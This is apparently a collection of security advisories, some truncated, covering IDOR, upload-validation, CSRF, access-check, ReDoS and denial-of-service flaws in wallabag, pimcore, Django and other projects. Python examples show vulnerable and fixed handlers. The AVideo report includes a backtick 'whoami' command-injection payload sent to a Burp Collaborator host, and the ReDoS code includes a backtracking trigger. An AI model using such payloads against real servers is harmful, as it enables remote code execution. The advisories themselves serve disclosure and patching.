Source
ghsa
### Impact

The annotations feature lets users add annotations on highlighted parts of an entry. The controller does not validate authorization on `PUT` and `DELETE` requests, which lets a logged-in user modify or delete any annotation by using its ID on the endpoint `example.org/annotations/{id}`. These vulnerable requests also disclose highlighted parts of the entry to the attacker. You should immediately patch your instance to version 2.5.3 or higher if you have more than one user and/or have open registration.

### Resolution

A user check is now done in the vulnerable methods before applying changes to an annotation. The `Annotation` retrieval through a `ParamConverter` has also been replaced with a call to the `AnnotationRepository` in order to prevent any information disclosure through response discrepancy.

### Workarounds

### Credits

We would like to thank @bAuh0lz for reporting this issue through huntr.dev. Reference: https://huntr.dev/bounties/8fdd9b31-d89b-4bbe-9557-20...
# Description

The export feature lets a user export a single entry or a set of entries in a given format (_e.g. PDF, MOBI, TXT_). For example, `https://yourinstance.wallabag.org/export/45.pdf` will export the entry with id 45 in PDF format. Since wallabag 2.0.0-alpha.1, this feature is vulnerable to an insecure direct object reference (IDOR) attack: a logged-in user can export any single entry without ownership validation. This is due to a lack of access validation in the `downloadEntryAction` method.

**You should immediately patch your instance to version 2.5.3 or higher if you have more than one user and/or have open registration.**

# Resolution

A user check is now done in the vulnerable method before sending the exported entry. The `Entry` retrieval through a `ParamConverter` has also been replaced with a call to the `EntryRepository` in order to prevent any information disclosure through response discrepancy.

# Workaround

If you are unable to update to the latest version or if yo...
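The same authorization pattern underlies both wallabag advisories above (annotations and export). As an added example that is not wallabag's code, here it is modelled in Python: a lookup keyed on the id alone, the intermediate "check the owner after loading" variant whose 403/404 split still reveals which ids exist, and the repository call scoped to the current user that both resolutions describe. `EntryRepository`, the handlers and the sample entries are assumptions.

```python
# Added example (not wallabag's code): the IDOR and the "response
# discrepancy" from the two advisories above, modelled in plain Python.
# EntryRepository, the handlers and the sample data are assumptions.
from dataclasses import dataclass


@dataclass
class Entry:
    id: int
    user_id: int
    content: str


class EntryRepository:
    def __init__(self, entries):
        self._by_id = {e.id: e for e in entries}

    def find_by_id(self, entry_id):
        # ParamConverter-style lookup: keyed on the id alone.
        return self._by_id.get(entry_id)

    def find_by_id_and_user(self, entry_id, user_id):
        # Ownership is part of the query: a foreign id and a missing id
        # look the same to the caller, so nothing leaks.
        entry = self._by_id.get(entry_id)
        return entry if entry and entry.user_id == user_id else None


# Constructed sample data: user 1 owns entry 45, user 2 owns entry 46.
REPO = EntryRepository([Entry(45, 1, "alice's entry"),
                        Entry(46, 2, "bob's entry")])


def export_vulnerable(entry_id, current_user_id):
    """Before 2.5.3: entry resolved by id only, no ownership check."""
    entry = REPO.find_by_id(entry_id)
    return (404, None) if entry is None else (200, entry.content)


def export_half_fixed(entry_id, current_user_id):
    """Owner check after a ParamConverter-style load: no longer an IDOR,
    but 403 vs 404 still reveals which ids exist."""
    entry = REPO.find_by_id(entry_id)
    if entry is None:
        return 404, None
    if entry.user_id != current_user_id:
        return 403, None
    return 200, entry.content


def export_fixed(entry_id, current_user_id):
    """The advisory's resolution: a repository call scoped to the user,
    so both missing and foreign entries answer 404."""
    entry = REPO.find_by_id_and_user(entry_id, current_user_id)
    return (404, None) if entry is None else (200, entry.content)
```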
### Impact

The upload functionality for updating a user profile does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (e.g. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain.

### Patches

Update to version 10.5.16 or apply this patch manually: https://github.com/pimcore/pimcore/pull/14125.patch
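An added example, not pimcore's code, of the check the advisory describes: a signature-only test accepts a body that starts with the GIF magic bytes followed by HTML, while binding the client's declared content-type, the file extension and the sniffed signature together rejects it. The allowlists and function names are assumptions.

```python
# Added example (not pimcore's code): why a signature check alone can be
# bypassed and how to bind declared type, extension and content together.
# The allowlists and function names are assumptions for this example.

# Magic bytes of the image types accepted here; GIF files start with
# "GIF87a" or "GIF89a", which is the signature the advisory refers to.
SIGNATURES = {
    "image/gif": (b"GIF87a", b"GIF89a"),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
}
EXTENSIONS = {"image/gif": {"gif"}, "image/png": {"png"},
              "image/jpeg": {"jpg", "jpeg"}}


def sniff_type(data):
    """Return the allowlisted MIME type whose signature the bytes start with."""
    for mime, signatures in SIGNATURES.items():
        if data.startswith(signatures):
            return mime
    return None


def accept_vulnerable(filename, declared_type, data):
    """Before: only the signature is inspected. A body of 'GIF89a<html>...'
    passes, while the client-chosen name and content-type are kept and
    later decide how the browser interprets the file."""
    return sniff_type(data) is not None


def accept_fixed(filename, declared_type, data):
    """After: the declared content-type must be allowlisted, the extension
    must belong to that type, and the sniffed signature must agree."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return (declared_type in SIGNATURES
            and ext in EXTENSIONS[declared_type]
            and sniff_type(data) == declared_type)
```

Accepted files should still be served with `X-Content-Type-Options: nosniff` and, ideally, from a separate origin, so that an image-typed body that happens to contain markup is never interpreted as a document of the application's domain.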
### Cause

`is_valid_eth_signature` is missing a call to `finalize_keccak` after calling `verify_eth_signature`.

### Impact

As a result, any contract using `is_valid_eth_signature` from the account library (such as the `EthAccount` preset) is vulnerable to a malicious sequencer. Specifically, the malicious sequencer would be able to bypass signature validation to impersonate an instance of these accounts.

### Risk

In order to exploit this vulnerability, it is required to control a sequencer or prover, since they are the ones executing the hints and are therefore able to inject incorrect keccak results. Today StarkWare is the only party running both a prover and a sequencer, which greatly reduces the risk of exploitation.

### Patches

The issue has been patched in 0.6.1.

### For more information

If you have any questions or comments about this advisory:

* Open an issue in [the Contracts for Cairo repository](https://github.com/OpenZeppelin/cairo-contracts/issues/new/choose)
* Email us at [security@openzepp...
Clockwork Web before 0.1.2, when used with Rails before 5.2, allows Cross-Site Request Forgery (CSRF). A CSRF attack works by getting an authorized user to visit a malicious website, which then performs requests on the user's behalf. In this instance, the actions include enabling and disabling jobs. All users running an affected release on Rails < 5.2 should upgrade immediately.
A missing access check in the `InvitationController` allows an unauthenticated user to delete all frontend users.
A missing access check in the `InvitationController` allows an unauthenticated user with a valid invitation link to set the password of all frontend users.
### Impact

Unsanitized input flows into the Strategy match operation (EXIST), where it is used to build a regular expression. This may result in a Regular Expression Denial of Service (ReDoS) attack.

### Patches

Patched in 3.1.4.

### Workarounds

Avoid using Strategy settings that use REGEX in conjunction with EXIST and NOT_EXIST operations.
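An added example, not the affected project's code, modelling the EXIST operation in Python: first with the user-supplied value compiled into a regex as the advisory describes, then as a literal substring test (and an escaped-regex equivalent) that cannot be made to backtrack. Function names and the sample inputs are assumptions.

```python
# Added example (not the project's code): a Strategy EXIST check modelled in
# Python, first with the user value compiled into a regex as the advisory
# describes, then as the literal test it should have been. Names are assumptions.
import re
import time


def exist_vulnerable(value, candidates):
    """Before 3.1.4: the value flows into the regex verbatim. Metacharacters
    change the match, and a value such as '(a+)+$' backtracks exponentially."""
    pattern = re.compile(value)
    return any(pattern.search(c) for c in candidates)


def exist_fixed(value, candidates):
    """After: EXIST asks "is this value present", which is a substring test.
    No regex is built from user input, so there is nothing to catastrophically
    backtrack and no metacharacter is interpreted."""
    return any(value in c for c in candidates)


def exist_escaped(value, candidates):
    """Equivalent when the matching code path must stay regex-based: escape the
    value so it is matched literally."""
    pattern = re.compile(re.escape(value))
    return any(pattern.search(c) for c in candidates)


def timed(check, value, candidates):
    """Seconds spent in one check; used to show the cost difference."""
    start = time.perf_counter()
    check(value, candidates)
    return time.perf_counter() - start


if __name__ == "__main__":
    # Constructed ReDoS trigger: nested quantifier with a non-matching tail.
    # n is kept small so the demo finishes; cost doubles with each extra 'a'.
    evil, text = "(a+)+$", "a" * 18 + "!"
    print("vulnerable:", timed(exist_vulnerable, evil, [text]))
    print("fixed:     ", timed(exist_fixed, evil, [text]))
```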
Description: I found a very critical vulnerability on your open source program called RCE (Remote Code Execution), where an attacker can arbitrarily execute code on the server.

Impact: An attacker could execute remote code on your system.

Steps to Reproduce:

1. Go to the My Videos tab https://demo.avideo.com/mvideos
2. Click "Embed a video link"
3. Get your Burp Suite Collaborator link. Example: [o4ta880iz4vap09kaqw400po8fe52u.oastify.com](http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com/)
4. Now put this RCE payload in the Video Link field [http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?`whoami`](http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com/?whoami), then click Save
5. Now go to the Burp Suite Collaborator client and see the response
In Django 3.2 before 3.2.17, 4.0 before 4.0.9, and 4.1 before 4.1.6, the parsed values of Accept-Language headers are cached in order to avoid repetitive parsing. This leads to a potential denial-of-service vector via excessive memory usage if the raw value of Accept-Language headers is very large.
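An added example, not Django's code, that models the cached parser described above and the growth bound a fix needs: a parser with a dict cache in front of it, a bounded wrapper that trims oversized headers at the last comma before they reach the cache, and a helper that measures how much key material the cache holds. The 500-character limit, the dict cache and all names are assumptions of this example.

```python
# Added example, not Django's code: a cached Accept-Language parser like the
# one the advisory describes, plus the size bound a fix needs. The 500-char
# limit, the dict cache and all names are assumptions of this example.
import re

MAX_HEADER_LENGTH = 500
_CACHE = {}  # stands in for the lru_cache in front of the real parser

_PIECE = re.compile(  # one header element: language tag, optional q-value
    r"([A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*|\*)"
    r"(?:\s*;\s*q=(0(?:\.\d{0,3})?|1(?:\.0{0,3})?))?"
)


def _parse(lang_string):
    """'en-US,en;q=0.8' -> (('en-US', 1.0), ('en', 0.8)); a malformed
    piece makes the whole header parse as ()."""
    result = []
    for piece in lang_string.split(","):
        match = _PIECE.fullmatch(piece.strip())
        if match is None:
            return ()
        result.append((match.group(1), float(match.group(2) or 1)))
    result.sort(key=lambda item: item[1], reverse=True)
    return tuple(result)


def _cached_parse(lang_string):
    if lang_string not in _CACHE:
        _CACHE[lang_string] = _parse(lang_string)
    return _CACHE[lang_string]


def parse_vulnerable(lang_string):
    """Before: every distinct header value becomes a cache key, however
    large and even when it parses to nothing."""
    return _cached_parse(lang_string)


def parse_fixed(lang_string):
    """After: an oversized header is cut at the last comma inside the
    bound before it reaches the cache, so no key exceeds the bound."""
    if len(lang_string) <= MAX_HEADER_LENGTH:
        return _cached_parse(lang_string)
    index = lang_string.rfind(",", 0, MAX_HEADER_LENGTH)
    return _cached_parse(lang_string[:index]) if index > 0 else ()


def cache_key_bytes():
    # Characters held as cache keys: the memory an attacker inflates.
    return sum(len(key) for key in _CACHE)


def clear_cache():
    _CACHE.clear()
```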